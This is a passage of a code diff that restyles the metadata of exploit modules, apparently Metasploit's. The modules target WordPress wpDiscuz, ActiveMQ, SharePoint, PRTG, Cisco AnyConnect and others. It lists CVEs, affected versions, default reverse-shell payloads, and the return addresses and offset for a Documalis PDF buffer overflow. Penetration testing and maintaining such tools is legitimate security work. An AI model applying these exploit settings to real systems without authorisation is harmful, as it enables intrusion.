+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            }
+          ]
+        ],
         'Privileged' => false,
         'DefaultTarget' => 0
       )

--- a/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb
@@ -21,36 +21,32 @@ class MetasploitModule < Msf::Exploit::Remote
           to upload arbitrary files, including PHP files, and achieve remote code execution on a
           vulnerable site’s server.
         },
-        'Author' =>
-            [
-              'Chloe Chamberland', # Vulnerability Discovery, initial msf module
-              'Hoa Nguyen - SunCSR'  # Metasploit Module enhancement
-            ],
+        'Author' => [
+          'Chloe Chamberland', # Vulnerability Discovery, initial msf module
+          'Hoa Nguyen - SunCSR'  # Metasploit Module enhancement
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-            [
-              ['CVE', '2020-24186'],
-              ['WPVDB', '10333'],
-              ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
-              ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
-              ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
-            ],
+        'References' => [
+          ['CVE', '2020-24186'],
+          ['WPVDB', '10333'],
+          ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
+          ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
+        ],
         'Privileged' => false,
         'Platform' => 'php',
         'Arch' => ARCH_PHP,
         'Targets' => [['wpDiscuz < 7.0.5', {}]],
         'DisclosureDate' => '2020-02-21',
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'php/meterpreter/reverse_tcp'
-          },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [CRASH_SAFE],
-            'Reliability' => [REPEATABLE_SESSION],
-            'SideEffects' => [ARTIFACTS_ON_DISK]
-          }
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
       )
       )
 

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -22,47 +22,41 @@ class MetasploitModule < Msf::Exploit::Remote
           user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'metacom', # Vulnerability discovery and PoC
-            '<metacom27[at]gmail.com>', # Metasploit module
-          ],
-        'References' =>
-          [
-          ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'process'
-          },
+        'Author' => [
+          'metacom', # Vulnerability discovery and PoC
+          '<metacom27[at]gmail.com>', # Metasploit module
+        ],
+        'References' => [
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'process'
+        },
         'Platform' => 'win',
-        'Payload' =>
-          {
-            'Space' => 1715,
-            'DisableNops' => true
-          },
-        'Targets' =>
+        'Payload' => {
+          'Space' => 1715,
+          'DisableNops' => true
+        },
+        'Targets' => [
           [
-            [
-              'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
-              {
-                'Ret' => 0x0040160D, # pop esi # pop ebx # ret  - PDFEditor.exe
-                'Offset' => 433
-              }
-            ],
-            [
-              'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
-              {
-                'Ret' => 0x004023FC, # pop edx # pop ebx # ret  - DocumentScanner.exe
-                'Offset' => 433
-              }
-            ]
+            'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
+            {
+              'Ret' => 0x0040160D, # pop esi # pop ebx # ret  - PDFEditor.exe
+              'Offset' => 433
+            }
           ],
-        'Notes' =>
-          {
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SERVICE_DOWN ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK ]
-          },
+          [
+            'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
+            {
+              'Ret' => 0x004023FC, # pop edx # pop ebx # ret  - DocumentScanner.exe
+              'Offset' => 433
+            }
+          ]
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
         'Privileged' => false,
         'DisclosureDate' => '2020-05-22',
         'DefaultTarget' => 0

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -23,29 +23,26 @@ class MetasploitModule < Msf::Exploit::Remote
           an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
           payload and obtain a shell.
         },
-        'Author' =>
-          [
-            'David Jorm',     # Discovery and exploit
-            'Erik Wynter'     # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2015-1830' ],
-            [ 'EDB', '40857'],
-            [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
-          ],
+        'Author' => [
+          'David Jorm', # Discovery and exploit
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          [ 'CVE', '2015-1830' ],
+          [ 'EDB', '40857'],
+          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
+        ],
         'Privileged' => false,
         'Platform' => %w[win],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows Java',
-              {
-                'Arch' => ARCH_JAVA,
-                'Platform' => 'win'
-              }
-            ],
+            'Windows Java',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
           ],
+        ],
         'DisclosureDate' => '2015-08-19',
         'License' => MSF_LICENSE,
         'DefaultOptions' => {

--- a/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
+++ b/modules/exploits/windows/http/cayin_xpost_sql_rce.rb
@@ -24,35 +24,31 @@ class MetasploitModule < Msf::Exploit::Remote
           seem to be valid.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
-          ],
-        'References' =>
-          [
-            [ 'EDB', '48558' ],
-            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
-            [ 'CVE', '2020-7356' ]
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
+        ],
+        'References' => [
+          [ 'EDB', '48558' ],
+          [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
+          [ 'CVE', '2020-7356' ]
+        ],
         'Platform' => ['java', 'win'],
         'Privileged' => true,
         'Arch' => ARCH_JAVA,
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-06-04',
 
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
-          },
-        'Payload' => # meterpreter is too large for payload space
-          {
-            'Space' => 2000,
-            'DisableNops' => true
-          },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        # meterpreter is too large for payload space
+        'Payload' => {
+          'Space' => 2000,
+          'DisableNops' => true
+        },
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
+++ b/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
@@ -22,16 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote
           to get code execution on the target.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'M3@ZionLab from DBAppSecurity', # Original discovery
-            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
-          ],
-        'References' =>
-          [
-            ['CVE', '2019-13372'],
-            ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
-          ],
+        'Author' => [
+          'M3@ZionLab from DBAppSecurity', # Original discovery
+          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
+        ],
+        'References' => [
+          ['CVE', '2019-13372'],
+          ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
+        ],
         'Targets' => [ [ 'Automatic', {}] ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {

--- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
+++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
@@ -48,31 +48,28 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Jon Park', 'Jon Seigel' ],
-        'References' =>
-          [
-            [ 'CVE', '2017-9822' ],
-            [ 'CVE', '2018-15811'],
-            [ 'CVE', '2018-15812'],
-            [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811
-            [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812
-            [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'],
-            [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'],
-            [ 'URL', 'https://github.com/pwntester/ysoserial.net']
-          ],
+        'References' => [
+          [ 'CVE', '2017-9822' ],
+          [ 'CVE', '2018-15811'],
+          [ 'CVE', '2018-15812'],
+          [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811
+          [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812
+          [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'],
+          [ 'URL', 'https://github.com/pwntester/ysoserial.net']
+        ],
         'Platform' => 'win',
-        'Targets' =>
-          [
-            [ 'Automatic', { 'auto' => true } ],
-            [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
-            [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
-            [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ],
-            [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
-          ],
+        'Targets' => [
+          [ 'Automatic', { 'auto' => true } ],
+          [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
+          [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
+          [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ],
+          [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
+        ],
         'Stance' => Msf::Exploit::Stance::Aggressive,
-        'Payload' =>
-          {
+        'Payload' => {
 
-          },
+        },
         'Privileged' => false,
         'DisclosureDate' => '2017-07-20',
         'DefaultOptions' => { 'WfsDelay' => 5 },

--- a/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
+++ b/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb
@@ -36,34 +36,31 @@ class MetasploitModule < Msf::Exploit::Remote
           tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Erik Wynter' # @wyntererik - Discovery & Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-27386'],
-          ],
+        'Author' => [
+          'Erik Wynter' # @wyntererik - Discovery & Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-27386'],
+        ],
         'Platform' => 'win',
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows (x86)', {
-                'Arch' => [ARCH_X86],
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
-                }
+            'Windows (x86)', {
+              'Arch' => [ARCH_X86],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Windows (x64)', {
-                'Arch' => [ARCH_X64],
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Windows (x64)', {
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
         'DefaultTarget' => 0,
         'Privileged' => false,
         'DisclosureDate' => '2020-09-28'

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -21,28 +21,25 @@ class MetasploitModule < Msf::Exploit::Remote
           Windows 10 Enterprise.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
-          ],
-        'References' =>
-          [
-            ['CVE', '2021-3378'],
-            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
-          ],
+        'Author' => [
+          'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-3378'],
+          ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
+        ],
 
         'Platform' => ['win'],
         'Privileged' => false,
         'Arch' => [ARCH_X86, ARCH_X64],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'FortiLogger < 5.2.0',
-              {
-                'Platform' => 'win'
-              }
-            ],
+            'FortiLogger < 5.2.0',
+            {
+              'Platform' => 'win'
+            }
           ],
+        ],
         'DisclosureDate' => '2021-02-26',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb
+++ b/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb
@@ -60,8 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DefaultTarget' => 1,
         'DisclosureDate' => '2020-12-15',
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]

--- a/modules/exploits/windows/http/kentico_staging_syncserver.rb
+++ b/modules/exploits/windows/http/kentico_staging_syncserver.rb
@@ -22,17 +22,15 @@ class MetasploitModule < Msf::Exploit::Remote
           input is passed to an insecure .NET deserialize call which allows for remote command execution.
         },
         'DisclosureDate' => '2019-04-15',
-        'Author' =>
-          [
-            'Manoj Cherukuri',  # Discovery
-            'Justin LeMay',     # Discovery
-            'aushack',          # msf exploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2019-10068'],
-            ['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
-          ],
+        'Author' => [
+          'Manoj Cherukuri', # Discovery
+          'Justin LeMay',     # Discovery
+          'aushack',          # msf exploit
+        ],
+        'References' => [
+          ['CVE', '2019-10068'],
+          ['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
+        ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Payload' => { 'DisableNops' => true },

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -24,36 +24,32 @@ class MetasploitModule < Msf::Exploit::Remote
           should be enabled.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'kindredsec', # POC on www.exploit-db.com
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '48360']
-          ],
+        'Author' => [
+          'kindredsec', # POC on www.exploit-db.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '48360']
+        ],
         'Platform' => %w[windows],
         'Arch' => [ARCH_X64],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows',
-              {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Type' => :windows_powershell
-              }
-            ]
-          ],
+            'Windows',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_powershell
+            }
+          ]
+        ],
         'Privileged' => true,
         'DisclosureDate' => '2020-10-20',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
         'DefaultOptions' => { 'SSL' => true }
       )
     )

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -25,19 +25,17 @@ class MetasploitModule < Msf::Exploit::Remote
           as subsuquent writes will make Dict-1, and not execute.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Chris Lyne' # discovery, POC
-          ],
-        'References' =>
-          [
-            ['URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
-            ['URL', 'https://www.tenable.com/security/research/tra-2020-32'],
-            ['URL', 'http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/'],
-            ['URL', 'https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819'],
-            ['CVE', '2020-5741']
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Chris Lyne' # discovery, POC
+        ],
+        'References' => [
+          ['URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2020-32'],
+          ['URL', 'http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/'],
+          ['URL', 'https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819'],
+          ['CVE', '2020-5741']
+        ],
         'Platform' => ['python'],
         'Privileged' => false,
         'Arch' => [ARCH_PYTHON],
@@ -49,10 +47,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES] # we attempt to revert config changes
         },
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-05-07',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/windows/http/prtg_authenticated_rce.rb
+++ b/modules/exploits/windows/http/prtg_authenticated_rce.rb
@@ -24,22 +24,19 @@ class MetasploitModule < Msf::Exploit::Remote
           This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Josh Berry <josh.berry[at]codewatch.org>', # original discovery
-            'Julien Bedel <contact[at]julienbedel.com>', # module writer
-          ],
-        'References' =>
-          [
-            ['CVE', '2018-9276'],
-            ['URL', 'https://www.codewatch.org/blog/?p=453']
-          ],
+        'Author' => [
+          'Josh Berry <josh.berry[at]codewatch.org>', # original discovery
+          'Julien Bedel <contact[at]julienbedel.com>', # module writer
+        ],
+        'References' => [
+          ['CVE', '2018-9276'],
+          ['URL', 'https://www.codewatch.org/blog/?p=453']
+        ],
         'Platform' => 'win',
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'Targets' =>
-          [
-            ['Automatic Targeting', { 'auto' => true }]
-          ],
+        'Targets' => [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'WfsDelay' => 30 # because notification triggers are queuded up on the server

--- a/modules/exploits/windows/http/sharepoint_data_deserialization.rb
+++ b/modules/exploits/windows/http/sharepoint_data_deserialization.rb
@@ -65,8 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-07-14',
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]

--- a/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
+++ b/modules/exploits/windows/http/sharepoint_workflows_xoml.rb
@@ -47,8 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-03-02',
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [CRASH_SAFE,],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]

--- a/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
+++ b/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
@@ -30,20 +30,18 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/'],
         ],
         'Platform' => 'win',
-        'Targets' =>
-          [
-            [ 'Windows (x86)', { 'Arch' => ARCH_X86, 'Type' => :windows_dropper } ],
-            [ 'Windows (x64)', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper } ],
-            [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ]
-          ],
+        'Targets' => [
+          [ 'Windows (x86)', { 'Arch' => ARCH_X86, 'Type' => :windows_dropper } ],
+          [ 'Windows (x64)', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper } ],
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ]
+        ],
         'DefaultTarget' => 1,
         'DisclosureDate' => '2020-02-11',
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE, ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-            'Reliability' => [ REPEATABLE_SESSION, ]
-          },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        },
         'Privileged' => true
       )
     )

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -31,39 +31,36 @@ class MetasploitModule < Msf::Exploit::Remote
           Windows 10 (XAMPP server).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Daniel Monzón', # Discovery
-            'Melvin Boers', # PoC
-            'Erik Wynter' # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['EDB', '48633'], # PoC
-            ['CVE', '2020-7361']
-          ],
+        'Author' => [
+          'Daniel Monzón', # Discovery
+          'Melvin Boers', # PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['EDB', '48633'], # PoC
+          ['CVE', '2020-7361']
+        ],
         'Platform' => 'win',
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows (x86)', {
-                'Arch' => [ARCH_X86],
-                'CmdStagerFlavor' => :certutil,
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
-                }
+            'Windows (x86)', {
+              'Arch' => [ARCH_X86],
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Windows (x64)', {
-                'Arch' => [ARCH_X64],
-                'CmdStagerFlavor' => :certutil,
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Windows (x64)', {
+              'Arch' => [ARCH_X64],
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-06-20'
       )

--- a/modules/exploits/windows/local/anyconnect_lpe.rb
+++ b/modules/exploits/windows/local/anyconnect_lpe.rb
@@ -45,12 +45,11 @@ class MetasploitModule < Msf::Exploit::Local
           1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Yorick Koster', # original PoC CVE-2020-3153, analysis
-            'Antoine Goichot (ATGO)', # PoC CVE-2020-3153, original PoC for CVE-2020-3433, update of msf module
-            'Christophe De La Fuente' # msf module for CVE-2020-3153
-          ],
+        'Author' => [
+          'Yorick Koster', # original PoC CVE-2020-3153, analysis
+          'Antoine Goichot (ATGO)', # PoC CVE-2020-3153, original PoC for CVE-2020-3433, update of msf module
+          'Christophe De La Fuente' # msf module for CVE-2020-3153
+        ],
         'Platform' => 'win',
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'meterpreter' ],
@@ -63,14 +62,13 @@ class MetasploitModule < Msf::Exploit::Local
           ]
         ],
         'Privileged' => true,
-        'References' =>
-          [
-            ['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
-            ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
-            ['CVE', '2020-3153'],
-            ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW'],
-            ['CVE', '2020-3433']
-          ],
+        'References' => [
+          ['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
+          ['CVE', '2020-3153'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW'],
+          ['CVE', '2020-3433']
+        ],
         'DisclosureDate' => '2020-08-05',
         'Notes' => {
           'SideEffects' => [ARTIFACTS_ON_DISK],

--- a/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb
+++ b/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb
@@ -67,41 +67,35 @@ class MetasploitModule < Msf::Exploit::Local
             run "check" command to run checklist.
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-        [
-          'Cassandre', # Adapted decoder's POC for metasploit
-          'Andrea Pierini (decoder)', # Lonely / Juicy Potato. Has written the POC
-          'Antonio Cocomazzi (splinter_code)',
-          'Roberto (0xea31)',
-        ],
+          'Author' => [
+            'Cassandre', # Adapted decoder's POC for metasploit
+            'Andrea Pierini (decoder)', # Lonely / Juicy Potato. Has written the POC
+            'Antonio Cocomazzi (splinter_code)',
+            'Roberto (0xea31)',
+          ],
           'Arch' => [ARCH_X86, ARCH_X64],
           'Platform' => 'win',
           'SessionTypes' => ['meterpreter'],
-          'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'none',
-          'WfsDelay' => '120'
-        },
-          'Targets' =>
-        [
-          ['Automatic', {}]
-        ],
-          'Notes' =>
-        {
-          'Stability' => [CRASH_SAFE],
-          'SideEffects' => [SCREEN_EFFECTS],
-          'Reliability' => [REPEATABLE_SESSION]
-        },
-          'Payload' =>
-             {
-               'DisableNops' => true,
-               'BadChars' => "\x00"
-             },
-          'References' =>
-        [
-          ['URL', 'https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/'],
-          ['URL', 'https://github.com/antonioCoco/RogueWinRM'],
-        ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'none',
+            'WfsDelay' => '120'
+          },
+          'Targets' => [
+            ['Automatic', {}]
+          ],
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'SideEffects' => [SCREEN_EFFECTS],
+            'Reliability' => [REPEATABLE_SESSION]
+          },
+          'Payload' => {
+            'DisableNops' => true,
+            'BadChars' => "\x00"
+          },
+          'References' => [
+            ['URL', 'https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/'],
+            ['URL', 'https://github.com/antonioCoco/RogueWinRM'],
+          ],
           'DisclosureDate' => '2019-12-06',
           'DefaultTarget' => 0
         }

--- a/modules/exploits/windows/local/canon_driver_privesc.rb
+++ b/modules/exploits/windows/local/canon_driver_privesc.rb
@@ -36,21 +36,18 @@ class MetasploitModule < Msf::Exploit::Local
           'Jacob Baines', # discovery, PoC, module
           'Shelby Pace' # original Ricoh module
         ],
-        'References' =>
-          [
-            ['CVE', '2021-38085'],
-          ],
+        'References' => [
+          ['CVE', '2021-38085'],
+        ],
